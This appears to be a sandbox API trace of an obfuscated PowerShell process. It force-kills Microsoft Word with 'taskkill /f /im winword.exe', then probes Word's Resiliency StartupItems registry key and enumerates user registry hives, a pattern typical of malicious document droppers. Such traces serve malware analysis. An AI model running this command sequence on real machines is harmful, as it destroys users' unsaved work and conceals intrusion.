[0083.289] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x47
[0083.289] SetErrorMode (uMode=0x1) returned 0x1
[0083.289] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\taskkill.VBE", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0xffffffffffffffff
[0083.290] SetErrorMode (uMode=0x1) returned 0x1
[0083.290] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x47
[0083.290] SetErrorMode (uMode=0x1) returned 0x1
[0083.290] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\taskkill.JS", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0xffffffffffffffff
[0083.291] SetErrorMode (uMode=0x1) returned 0x1
[0083.291] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x47
[0083.291] SetErrorMode (uMode=0x1) returned 0x1
[0083.291] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\taskkill.JSE", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0xffffffffffffffff
[0083.292] SetErrorMode (uMode=0x1) returned 0x1
[0083.292] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x47
[0083.292] SetErrorMode (uMode=0x1) returned 0x1
[0083.292] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\taskkill.WSF", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0xffffffffffffffff
[0083.293] SetErrorMode (uMode=0x1) returned 0x1
[0083.293] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x47
[0083.293] SetErrorMode (uMode=0x1) returned 0x1
[0083.293] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\taskkill.WSH", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0xffffffffffffffff
[0083.293] SetErrorMode (uMode=0x1) returned 0x1
[0083.294] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x47
[0083.294] SetErrorMode (uMode=0x1) returned 0x1
[0083.294] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\taskkill.MSC", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0xffffffffffffffff
[0083.294] SetErrorMode (uMode=0x1) returned 0x1
[0083.295] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x47
[0083.295] SetErrorMode (uMode=0x1) returned 0x1
[0083.295] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\taskkill", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0xffffffffffffffff
[0083.295] SetErrorMode (uMode=0x1) returned 0x1
[0083.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
[0083.296] SetErrorMode (uMode=0x1) returned 0x1
[0083.296] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\taskkill.ps1", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0xffffffffffffffff
[0083.296] SetErrorMode (uMode=0x1) returned 0x1
[0083.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
[0083.296] SetErrorMode (uMode=0x1) returned 0x1
[0083.296] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\taskkill.psm1", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0xffffffffffffffff
[0083.296] SetErrorMode (uMode=0x1) returned 0x1
[0083.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
[0083.296] SetErrorMode (uMode=0x1) returned 0x1
[0083.297] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\taskkill.psd1", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0xffffffffffffffff
[0083.297] SetErrorMode (uMode=0x1) returned 0x1
[0083.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
[0083.297] SetErrorMode (uMode=0x1) returned 0x1
[0083.297] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0xffffffffffffffff
[0083.297] SetErrorMode (uMode=0x1) returned 0x1
[0083.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
[0083.297] SetErrorMode (uMode=0x1) returned 0x1
[0083.297] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0x3176c0
[0083.298] FindClose (in: hFindFile=0x3176c0 | out: hFindFile=0x3176c0) returned 1
[0083.298] SetErrorMode (uMode=0x1) returned 0x1
[0083.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\taskkill.exe", nBufferLength=0x105, lpBuffer=0x1c81dcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\taskkill.exe", lpFilePart=0x0) returned 0x20
[0083.298] SetErrorMode (uMode=0x1) returned 0x1
[0083.298] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c81df00 | out: lpFileInformation=0x1c81df00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc609ebc, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xdc609ebc, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xf8a85bb0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x1b800)) returned 1
[0083.298] SetErrorMode (uMode=0x1) returned 0x1
[0083.302] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0083.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0083.302] CoTaskMemFree (pv=0x2569a0)
[0083.302] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0083.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0083.302] CoTaskMemFree (pv=0x2569a0)
[0083.331] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0083.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0083.331] CoTaskMemFree (pv=0x2569a0)
[0083.333] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0083.333] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0083.333] CoTaskMemFree (pv=0x2569a0)
[0083.359] CoTaskMemAlloc (cb=0x22) returned 0x1b832f70
[0083.388] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\taskkill.exe", dwFileAttributes=0x0, psfi=0x1c81e0e8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c81e0e8) returned 0x4550
[0083.447] CoTaskMemFree (pv=0x1b832f70)
[0083.447] GetConsoleWindow () returned 0x1022c
[0083.448] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0083.448] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
[0083.448] CoTaskMemFree (pv=0x2569a0)
[0083.448] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0083.448] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
[0083.448] CoTaskMemFree (pv=0x2569a0)
[0083.449] CommandLineToArgvW (in: lpCmdLine=" /f /im winword.exe", pNumArgs=0x1c81e130 | out: pNumArgs=0x1c81e130) returned 0x3176c0*=""
[0083.449] lstrlenW (lpString="/f") returned 2
[0083.450] CoTaskMemAlloc (cb=0x8) returned 0x1b83ee60
[0083.450] RtlMoveMemory (in: Destination=0x1b83ee60, Source=0x3176ea, Length=0x6 | out: Destination=0x1b83ee60)
[0083.450] CoTaskMemFree (pv=0x1b83ee60)
[0083.450] lstrlenW (lpString="/im") returned 3
[0083.450] CoTaskMemAlloc (cb=0xa) returned 0x1b8338b0
[0083.450] RtlMoveMemory (in: Destination=0x1b8338b0, Source=0x3176f0, Length=0x8 | out: Destination=0x1b8338b0)
[0083.450] CoTaskMemFree (pv=0x1b8338b0)
[0083.450] lstrlenW (lpString="winword.exe") returned 11
[0083.450] CoTaskMemAlloc (cb=0x1a) returned 0x1b832f70
[0083.450] RtlMoveMemory (in: Destination=0x1b832f70, Source=0x3176f8, Length=0x18 | out: Destination=0x1b832f70)
[0083.450] CoTaskMemFree (pv=0x1b832f70)
[0083.451] LocalFree (hMem=0x3176c0) returned 0x0
[0083.453] CoTaskMemAlloc (cb=0x804) returned 0x1b844de0
[0083.453] GetConsoleTitleW (in: lpConsoleTitle=0x1b844de0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe") returned 0x39
[0083.453] CoTaskMemFree (pv=0x1b844de0)
[0083.458] CoTaskMemAlloc (cb=0x88) returned 0x278bc0
[0083.458] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\taskkill.exe\" /f /im winword.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\Desktop", lpStartupInfo=0x1c81e090*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x311efe8 | out: lpCommandLine="\"C:\\Windows\\system32\\taskkill.exe\" /f /im winword.exe", lpProcessInformation=0x311efe8*(hProcess=0x3a0, hThread=0x34c, dwProcessId=0x5f4, dwThreadId=0xad0)) returned 1
[0083.461] CoTaskMemFree (pv=0x278bc0)
[0083.462] CloseHandle (hObject=0x34c) returned 1
[0083.462] CoTaskMemAlloc (cb=0x22) returned 0x1b832f70
[0083.462] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\taskkill.exe", dwFileAttributes=0x0, psfi=0x1c81e138, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c81e138) returned 0x4550
[0083.463] CoTaskMemFree (pv=0x1b832f70)
[0083.464] GetCurrentProcess () returned 0xffffffffffffffff
[0083.464] GetCurrentProcess () returned 0xffffffffffffffff
[0083.465] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3a0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c81e218, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c81e218*=0x34c) returned 1
[0084.929] CloseHandle (hObject=0x34c) returned 1
[0084.931] GetExitCodeProcess (in: hProcess=0x3a0, lpExitCode=0x1c81e288 | out: lpExitCode=0x1c81e288*=0x0) returned 1
[0084.942] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe") returned 1
[0084.943] CloseHandle (hObject=0x3a0) returned 1
[0084.992] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0084.992] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0084.992] CoTaskMemFree (pv=0x2569a0)
[0085.006] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0085.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0085.006] CoTaskMemFree (pv=0x2569a0)
[0085.019] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0085.019] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0085.019] CoTaskMemFree (pv=0x2569a0)
[0085.193] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0085.193] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0085.193] CoTaskMemFree (pv=0x2569a0)
[0085.194] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0085.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0085.194] CoTaskMemFree (pv=0x2569a0)
[0085.212] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x0) returned 0x2
[0085.213] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.213] CoTaskMemFree (pv=0x0)
[0085.213] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.213] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppEvents", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.213] CoTaskMemFree (pv=0x2baf50)
[0085.213] CoTaskMemFree (pv=0x0)
[0085.213] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.213] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Console", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.213] CoTaskMemFree (pv=0x2baf50)
[0085.213] CoTaskMemFree (pv=0x0)
[0085.213] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.213] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Control Panel", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.213] CoTaskMemFree (pv=0x2baf50)
[0085.213] CoTaskMemFree (pv=0x0)
[0085.213] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.213] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Environment", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.213] CoTaskMemFree (pv=0x2baf50)
[0085.213] CoTaskMemFree (pv=0x0)
[0085.213] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.213] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EUDC", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.213] CoTaskMemFree (pv=0x2baf50)
[0085.213] CoTaskMemFree (pv=0x0)
[0085.213] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.213] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Identities", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.214] CoTaskMemFree (pv=0x2baf50)
[0085.214] CoTaskMemFree (pv=0x0)
[0085.214] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.214] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Keyboard Layout", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.214] CoTaskMemFree (pv=0x2baf50)
[0085.214] CoTaskMemFree (pv=0x0)
[0085.214] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.214] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Network", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.214] CoTaskMemFree (pv=0x2baf50)
[0085.214] CoTaskMemFree (pv=0x0)
[0085.214] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.214] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Printers", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.214] CoTaskMemFree (pv=0x2baf50)
[0085.214] CoTaskMemFree (pv=0x0)
[0085.214] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.214] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Software", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.214] CoTaskMemFree (pv=0x2baf50)
[0085.214] CoTaskMemFree (pv=0x0)
[0085.214] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.214] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.214] CoTaskMemFree (pv=0x2baf50)
[0085.214] CoTaskMemFree (pv=0x0)
[0085.214] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.214] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Volatile Environment", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.214] CoTaskMemFree (pv=0x2baf50)
[0085.214] CoTaskMemFree (pv=0x0)
[0085.233] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x310) returned 0x0
[0085.233] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.233] CoTaskMemFree (pv=0x0)
[0085.233] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.233] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Adobe", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.233] CoTaskMemFree (pv=0x2baf50)
[0085.233] CoTaskMemFree (pv=0x0)
[0085.233] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.233] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppDataLow", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.234] CoTaskMemFree (pv=0x2baf50)
[0085.234] CoTaskMemFree (pv=0x0)
[0085.234] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.234] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Clients", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.234] CoTaskMemFree (pv=0x2baf50)
[0085.234] CoTaskMemFree (pv=0x0)
[0085.234] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.234] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Google", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.234] CoTaskMemFree (pv=0x2baf50)
[0085.234] CoTaskMemFree (pv=0x0)
[0085.234] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.234] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IM Providers", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.234] CoTaskMemFree (pv=0x2baf50)
[0085.234] CoTaskMemFree (pv=0x0)
[0085.234] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.234] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="JavaSoft", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.234] CoTaskMemFree (pv=0x2baf50)
[0085.234] CoTaskMemFree (pv=0x0)
[0085.234] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.234] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Macromedia", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.234] CoTaskMemFree (pv=0x2baf50)
[0085.234] CoTaskMemFree (pv=0x0)
[0085.234] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.234] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Microsoft", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.234] CoTaskMemFree (pv=0x2baf50)
[0085.234] CoTaskMemFree (pv=0x0)
[0085.234] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.234] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.234] CoTaskMemFree (pv=0x2baf50)
[0085.234] CoTaskMemFree (pv=0x0)
[0085.234] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
